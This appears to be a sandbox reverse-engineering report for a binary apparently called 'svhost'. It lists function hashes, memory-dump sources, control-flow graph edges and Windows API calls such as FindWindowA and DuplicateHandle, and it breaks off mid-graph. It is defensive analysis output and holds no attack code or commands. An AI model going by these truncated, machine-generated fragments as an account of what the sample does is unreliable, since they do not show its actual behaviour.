                                • Instruction ID: 25f4290d472474fece1389e6e0d89b03f027c9d5c1f9195f86432155538baa36
                                • Opcode Fuzzy Hash: b411da6f81d35f2caf219dd427d32d339668f90a59167d110d658ad442584987
                                • Instruction Fuzzy Hash: FFD18E9AE2AFD601F723433954026F5E6006FA77E4A81D337FDA970BF1DB28E2465214
                                Function 00007FF7AF6137A0 Relevance: .4, Instructions: 360COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 79fe5456667ef9833466b6fdb15118d59d977740f420bd064087247512c6ef8e
                                • Instruction ID: 90bca441524fe6f7eb801a2b2afdd228c71ce585e0eb87297fb26223f951be4e
                                • Opcode Fuzzy Hash: 79fe5456667ef9833466b6fdb15118d59d977740f420bd064087247512c6ef8e
                                • Instruction Fuzzy Hash: 1BE11697E4BAE502D601662A44941ECEF518329790BCE8377DFA90B393E92CC50FD232
                                Function 00007FF7AF7143B0 Relevance: .3, Instructions: 302COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 268ec1aacdb1fe4846bc5b92a042a3e2b7c47b1e4548a7ad4ced605a34636230
                                • Instruction ID: 66b8f4130e76ca9bad87aa1e762b5ea00348142b3ffe61a0d28c41282119a44f
                                • Opcode Fuzzy Hash: 268ec1aacdb1fe4846bc5b92a042a3e2b7c47b1e4548a7ad4ced605a34636230
                                • Instruction Fuzzy Hash: 11B1152AA0EAE181EB30EF11A4443F9A7A4EB5A794FD64131DF88036B4DF7DD099C714
                                Function 00007FF7AF5B0420 Relevance: .3, Instructions: 278COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4c4875a895d0f09f36026869cf6820fe14db2e1eacf13c1cb9f602961b163354
                                • Instruction ID: ace86002a73cb0562cbf99b1dd55ec25fd141bbc2074fb6ce398b0c95c4bc996
                                • Opcode Fuzzy Hash: 4c4875a895d0f09f36026869cf6820fe14db2e1eacf13c1cb9f602961b163354
                                • Instruction Fuzzy Hash: 10A14963E1A6F245E7249A1598007BDA691FB407B0F96C331CE7D17AE0EF78E491D360
                                Function 00007FF7AF613F30 Relevance: .3, Instructions: 261COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b6185661908372e7226849ff9cc8e164b5c7f7b25a2413a402097328763837e8
                                • Instruction ID: 2aaa268e9d7d073aa1dbb0a1158689ffaaa69e7da9d319ef67f4862caf4724bc
                                • Opcode Fuzzy Hash: b6185661908372e7226849ff9cc8e164b5c7f7b25a2413a402097328763837e8
                                • Instruction Fuzzy Hash: CB81B1127345A602EB68BA21A0024BBD396EF61BA0FD2D53CED9147AC8D33FD5D58744
                                Function 00007FF7AF6CD6D0 Relevance: .2, Instructions: 219COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: CallInformationPower
                                • String ID:
                                • API String ID: 3647440314-0
                                • Opcode ID: 1b20459011f1ea5ddf2cdd61571ecb0edd7bd29c3ef16e9b47d5b7e4ae3d535b
                                • Instruction ID: 292063ed85bdc7017c372c9164aabf726cc7793484bf736f8bdb12963bd560f2
                                • Opcode Fuzzy Hash: 1b20459011f1ea5ddf2cdd61571ecb0edd7bd29c3ef16e9b47d5b7e4ae3d535b
                                • Instruction Fuzzy Hash: 10B18B32A05BC088E7619F25E8413E87765FB58798F819225DE8C1BB69EF38E2D5C350
                                Function 00007FF7AF6E7010 Relevance: .2, Instructions: 191COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a74d41a9bcf77767d54403dbb99e95f9da3e0265e09def4d5d13b72d67b57fc9
                                • Instruction ID: d2a2232fb3254202e10fd1f166c3c6a994baf94e9e9f581474e4b45ea827b1e6
                                • Opcode Fuzzy Hash: a74d41a9bcf77767d54403dbb99e95f9da3e0265e09def4d5d13b72d67b57fc9
                                • Instruction Fuzzy Hash: 4E614443B0A2D287FB305656D4013FAA68AEB447C4F865536EEAD4B7D2CD3DD0429324
                                Function 00007FF7AF5C6700 Relevance: .2, Instructions: 177COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9959a03a93236036f899d7d00dbf722796d7f7aef2036a2a13ceaef01ac3df82
                                • Instruction ID: a2319778980fc90e996d4bf2bb0ca45e2fe9d57938344268b20f594d294abb00
                                • Opcode Fuzzy Hash: 9959a03a93236036f899d7d00dbf722796d7f7aef2036a2a13ceaef01ac3df82
                                • Instruction Fuzzy Hash: 38516DA2B1ABC542EE5497A561326BAD7619F893C0F80E132DECE57B55EF2CD3018350
                                Function 00007FF7AF5C5E10 Relevance: .2, Instructions: 162COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b699272a338765942fc6ab1c474b968edd63fa855cd6f01b5d4f775cc1fef8fa
                                • Instruction ID: 2a087e023274f51eb946aa655bb1b03aa14ab0ff7d2498d224807d955f466d5e
                                • Opcode Fuzzy Hash: b699272a338765942fc6ab1c474b968edd63fa855cd6f01b5d4f775cc1fef8fa
                                • Instruction Fuzzy Hash: F25158A2B09BC142FE10EB95A0613BAE761F7953C0F849132EE8E1765ADF3DD242C750
                                Function 00007FF7AF6D3A60 Relevance: .1, Instructions: 116COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ea5adf718fa6bfa682da224041c89a2247675bfd99bb36b6d2ca1966792e7823
                                • Instruction ID: 950f4c314948a6da3d8dbfcd56501b207f1e30d3c55be9805dc4306750373283
                                • Opcode Fuzzy Hash: ea5adf718fa6bfa682da224041c89a2247675bfd99bb36b6d2ca1966792e7823
                                • Instruction Fuzzy Hash: A741CF22B16B9084FB15EB65E8017EDA374BB59B88F849536CE9D277A4DF38D041C310
                                Function 00007FF7AF6D1090 Relevance: .1, Instructions: 106COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 79b6009976e8da50ed3299c885ae57b6221e6a0c54eababdc2c401a66e028cfb
                                • Instruction ID: f43fe965a1f21020b57c7aa6f1d1e5e9639907f553488485891c6373aa4c3a43
                                • Opcode Fuzzy Hash: 79b6009976e8da50ed3299c885ae57b6221e6a0c54eababdc2c401a66e028cfb
                                • Instruction Fuzzy Hash: F2310333702B8595EA55EF16EC006A9B7ACFB88BA4F859532DE5C073A0DF38D592C310
                                Function 00007FF7AF6C8420 Relevance: .1, Instructions: 99COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b41a1baf09d41418d64748ce506df3e5504cfd634539c9eb8f8c0e73e223b295
                                • Instruction ID: 239d16a97eaaee4205f36f10768ff78e9d0b3cca0ad263965da221cc9bd67286
                                • Opcode Fuzzy Hash: b41a1baf09d41418d64748ce506df3e5504cfd634539c9eb8f8c0e73e223b295
                                • Instruction Fuzzy Hash: 6E31C6E6B18FC042FE50E7A9B56637B9321A7857D0F40E136DE8A6770ADF2DD1428240
                                Function 00007FF7AF5C6070 Relevance: .1, Instructions: 93COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bbeef57037a608dc15a9224f84f578c55c1d6b51c341b2a51c9172fe7347cf0b
                                • Instruction ID: 181fb61aec0f169e828fb7ff09e6004f4e5e6ac55707ce31dac65affb1348052
                                • Opcode Fuzzy Hash: bbeef57037a608dc15a9224f84f578c55c1d6b51c341b2a51c9172fe7347cf0b
                                • Instruction Fuzzy Hash: 5D31D9E5B19FC142FE40E7A9746637B9321A7857C0F40E236DE896B70ADF2ED1428284
                                Function 00007FF7AF5C61F0 Relevance: .1, Instructions: 90COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 83b9acce19444f53e505a0e128640eab12322cc4e2fe7834771383e608279ee7
                                • Instruction ID: 20396bfb975425e4dde20fc5830901bc2c85f3c7341bb453f8009215f7e751a4
                                • Opcode Fuzzy Hash: 83b9acce19444f53e505a0e128640eab12322cc4e2fe7834771383e608279ee7
                                • Instruction Fuzzy Hash: 0831BBD5B18FC042FE50E7B8746737B9311A7857D0F40E236DE8A6660BDF2DD1428644
                                Function 00007FF7AF6C82C0 Relevance: .1, Instructions: 86COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f4dda8b23606f2155451cbaaebedba24f44220a15dd36ee8d54c5c459df90cec
                                • Instruction ID: d8bed2910928522c36e76e59932d5dd258ac3de8f6e46b2bf59beb558d432aea
                                • Opcode Fuzzy Hash: f4dda8b23606f2155451cbaaebedba24f44220a15dd36ee8d54c5c459df90cec
                                • Instruction Fuzzy Hash: FE21C8E5B18F8442FE40E7E8746637B9321A7853C0F80E136DE8D6671ADF2DC1428680
                                Function 00007FF7AF5346D0 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 461COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 394 7ff7af5346d0-7ff7af5346d9 call 7ff7af531a00 397 7ff7af5346e0-7ff7af534755 call 7ff7af6edbd0 call 7ff7af533320 call 7ff7af6eea40 call 7ff7af6f3f90 394->397 408 7ff7af534757-7ff7af53477e call 7ff7af7052c0 397->408 409 7ff7af534785-7ff7af53478f 397->409 408->409 411 7ff7af534791-7ff7af53479e call 7ff7af6bdc20 409->411 412 7ff7af5347a3-7ff7af534838 call 7ff7af704ba0 call 7ff7af533320 409->412 411->412 423 7ff7af53483a-7ff7af534847 call 7ff7af6bdc20 412->423 424 7ff7af53484c-7ff7af534881 call 7ff7af5330c0 call 7ff7af70ed90 412->424 423->424 430 7ff7af5348b0-7ff7af5348e3 call 7ff7af718490 424->430 431 7ff7af534883-7ff7af534888 424->431 436 7ff7af5348e5-7ff7af5348f2 430->436 439 7ff7af534910-7ff7af534941 call 7ff7af70db40 430->439 433 7ff7af53488a 431->433 434 7ff7af5348a2-7ff7af5348a7 431->434 438 7ff7af534890-7ff7af534895 433->438 435 7ff7af5348a9 434->435 434->436 435->439 440 7ff7af5348f8-7ff7af5348ff 436->440 441 7ff7af5351b3-7ff7af5351eb call 7ff7af73b360 436->441 442 7ff7af534897-7ff7af53489d 438->442 443 7ff7af534901-7ff7af534909 438->443 445 7ff7af534944-7ff7af53496c FindWindowA 439->445 440->445 453 7ff7af5354c2-7ff7af535514 call 7ff7af6bdc20 441->453 442->438 448 7ff7af53489f 442->448 443->436 446 7ff7af53490b 443->446 451 7ff7af534979-7ff7af534990 445->451 452 7ff7af53496e-7ff7af534974 call 7ff7af6bdc20 445->452 446->439 448->434 455 7ff7af534b00-7ff7af534b0a call 7ff7af5330c0 451->455 456 7ff7af534996-7ff7af5349ef call 7ff7af6c6400 call 7ff7af538d30 451->456 452->451 455->397 464 7ff7af534b10-7ff7af534b60 call 7ff7af6fce10 call 7ff7af72e580 call 7ff7af6f4540 455->464 467 7ff7af534a19-7ff7af534a1d 456->467 480 7ff7af5351f0-7ff7af535226 call 7ff7af73b360 464->480 481 7ff7af534b66-7ff7af534bc6 CloseHandle * 2 464->481 467->394 469 7ff7af534a23-7ff7af534a27 467->469 472 7ff7af534a29 469->472 473 7ff7af534a51-7ff7af534aaa call 7ff7af70df00 * 2 469->473 475 7ff7af534a30-7ff7af534a4c 472->475 490 7ff7af534aac-7ff7af534ab9 call 7ff7af72ec00 473->490 491 7ff7af534abf-7ff7af534ac9 473->491 475->475 478 7ff7af534a4e 475->478 478->473 480->453 483 7ff7af534bc8-7ff7af534bcf CloseHandle 481->483 484 7ff7af534bd5-7ff7af534bdd 481->484 483->484 487 7ff7af534bec-7ff7af534bf4 484->487 488 7ff7af534bdf-7ff7af534be6 CloseHandle 484->488 495 7ff7af534bf6-7ff7af534bfd CloseHandle 487->495 496 7ff7af534c03-7ff7af534c0b call 7ff7af5315a0 487->496 488->487 490->491 502 7ff7af534c10-7ff7af534c1a 490->502 493 7ff7af534ad9-7ff7af534ae3 491->493 494 7ff7af534acb-7ff7af534ad4 call 7ff7af6bdc20 491->494 499 7ff7af534ae9-7ff7af534af7 call 7ff7af6bdc20 493->499 500 7ff7af534a00-7ff7af534a12 493->500 494->493 495->496 496->397 499->500 500->467 506 7ff7af534c2a-7ff7af534c34 502->506 507 7ff7af534c1c-7ff7af534c25 call 7ff7af6bdc20 502->507 508 7ff7af534c36-7ff7af534c3f call 7ff7af6bdc20 506->508 509 7ff7af534c44-7ff7af534cc5 call 7ff7af6ca190 506->509 507->506 508->509 514 7ff7af534ccb-7ff7af534cf9 call 7ff7af71aeb0 509->514 515 7ff7af5352cc-7ff7af5352f7 call 7ff7af73b360 509->515 520 7ff7af53522b-7ff7af53525c call 7ff7af73b360 514->520 521 7ff7af534cff-7ff7af534d09 514->521 515->453 520->453 522 7ff7af534d1d-7ff7af534db8 call 7ff7af531a00 call 7ff7af6fce10 call 7ff7af72e580 call 7ff7af71bcd0 521->522 523 7ff7af534d0b-7ff7af534d18 call 7ff7af6bdc20 521->523 535 7ff7af534dbe-7ff7af534e37 call 7ff7af6fcf10 * 3 call 7ff7af6f45e0 522->535 536 7ff7af53529c-7ff7af5352c7 call 7ff7af73b360 522->536 523->522 547 7ff7af534e3d-7ff7af534e47 535->547 548 7ff7af535261-7ff7af535297 call 7ff7af73b360 535->548 536->453 550 7ff7af534e49-7ff7af534e56 call 7ff7af6bdc20 547->550 551 7ff7af534e5b-7ff7af534e63 call 7ff7af5315a0 547->551 548->453 550->551 551->397
                                APIs
                                  • Part of subcall function 00007FF7AF6EDBD0: CreateWaitableTimerExW.KERNEL32(?,?,00000000,?,00000000,00000000,00007FF7AF533D31), ref: 00007FF7AF6EDBFA
                                  • Part of subcall function 00007FF7AF6EDBD0: SetWaitableTimer.KERNELBASE ref: 00007FF7AF6EDC50
                                  • Part of subcall function 00007FF7AF6EDBD0: WaitForSingleObject.KERNEL32 ref: 00007FF7AF6EDC62
                                  • Part of subcall function 00007FF7AF6EDBD0: CloseHandle.KERNEL32 ref: 00007FF7AF6EDC6D
                                  • Part of subcall function 00007FF7AF6EDBD0: Sleep.KERNEL32(?,?,00000000,?,00000000,00000000,00007FF7AF533D31), ref: 00007FF7AF6EDCC9
                                • FindWindowA.USER32 ref: 00007FF7AF534950
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: TimerWaitable$CloseCreateFindHandleObjectSingleSleepWaitWindow
                                • String ID: $ $CString conversion failed.$a Display implementation returned an error unexpectedly/rustc/b11fbfbf351b94c7eecf9e6749a4544a6d4717fa\library\alloc\src\string.rs$called `Result::unwrap()` on an `Err` value
                                • API String ID: 1739950655-3344740345
                                • Opcode ID: 2cc25b4c42b3b745d4f12881607477492ff325b7e2d2c0e2c8f9a0d6082b0fe0
                                • Instruction ID: ceba21fbd1b1b72ec7f475ac8d54a7c9dfb93b9da26a453b22022c7860a3ac49
                                • Opcode Fuzzy Hash: 2cc25b4c42b3b745d4f12881607477492ff325b7e2d2c0e2c8f9a0d6082b0fe0
                                • Instruction Fuzzy Hash: 5A32A67660ABC285EB79EF25D8503EC6365FB44788F815236EA4D0BBA9DF38D241C350
                                Function 00007FF7AF6F9740 Relevance: 16.8, APIs: 11, Instructions: 328COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 556 7ff7af6f9740-7ff7af6f9783 call 7ff7af6bdbf0 559 7ff7af6f9ede-7ff7af6f9ee8 call 7ff7af73ac10 556->559 560 7ff7af6f9789-7ff7af6f97a5 call 7ff7af6bdbf0 556->560 564 7ff7af6f9eed-7ff7af6f9f47 call 7ff7af73ac10 CloseHandle 559->564 560->564 565 7ff7af6f97ab-7ff7af6f97b4 560->565 567 7ff7af6f97b6-7ff7af6f97f1 GetCurrentProcess DuplicateHandle 565->567 568 7ff7af6f97fd 565->568 570 7ff7af6f9e01-7ff7af6f9e25 GetLastError call 7ff7af6bdc20 567->570 571 7ff7af6f97f7-7ff7af6f97fb 567->571 572 7ff7af6f97ff-7ff7af6f983c 568->572 581 7ff7af6f9e8d-7ff7af6f9eb6 call 7ff7af6bdc20 570->581 571->572 574 7ff7af6f9842-7ff7af6f9863 GetFileInformationByHandleEx 572->574 575 7ff7af6f9eb7-7ff7af6f9ec3 call 7ff7af6e8930 572->575 578 7ff7af6f9865-7ff7af6f9879 GetLastError 574->578 579 7ff7af6f9890-7ff7af6f989c 574->579 575->581 582 7ff7af6f9df6-7ff7af6f9dfd 578->582 583 7ff7af6f987f-7ff7af6f988c call 7ff7af5314d0 578->583 584 7ff7af6f98a4-7ff7af6f98ac 579->584 586 7ff7af6f9dff 582->586 587 7ff7af6f9e5a-7ff7af6f9e5c 582->587 583->579 589 7ff7af6f98b0-7ff7af6f98d5 call 7ff7af6f9000 584->589 592 7ff7af6f9e6e-7ff7af6f9e75 586->592 593 7ff7af6f9e60-7ff7af6f9e6c CloseHandle 587->593 598 7ff7af6f9be3-7ff7af6f9be7 589->598 599 